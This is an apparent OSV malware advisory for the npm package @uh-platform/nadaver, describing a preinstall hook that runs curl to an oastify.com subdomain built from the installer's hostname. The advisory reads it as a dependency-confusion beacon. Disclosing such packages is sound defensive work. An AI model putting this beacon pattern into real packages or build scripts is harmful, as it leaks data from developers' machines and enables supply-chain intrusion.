@uh-platform/nadaver@102.0.0
Vulnerability report · Last retrieved from osv.dev September 21, 2026 at 11:45 PM UTC
OSV ID
MAL-2026-16360
Ecosystem
npm
Summary
On npm install, the package's preinstall script executes node index.js, which shells out curl to http://$(hostname).nadaver.pa33pg1od9cr4ffnrzec8864jvpmdd12.oastify.com/, embedding the installer machine's hostname as a subdomain of an attacker-controlled Burp Collaborator (oastify.com) endpoint. Both DNS resolution and the HTTP request leak the installer's hostname to the attacker on every install, with no user interaction. The @uh-platform scope combined with an unusually high version number (102.0.0) is consistent with a dependency-confusion beacon aimed at internal build systems that resolve the scope against the public npm registry.
Source: amazon-inspector (66c8fbea9d97af1bd5c48147e744ff5e0feaded686c613591e7defd2f75e2e17)
Protect your entire dependency tree
Scan your lock files automatically on every PR. Block malicious packages before they reach production.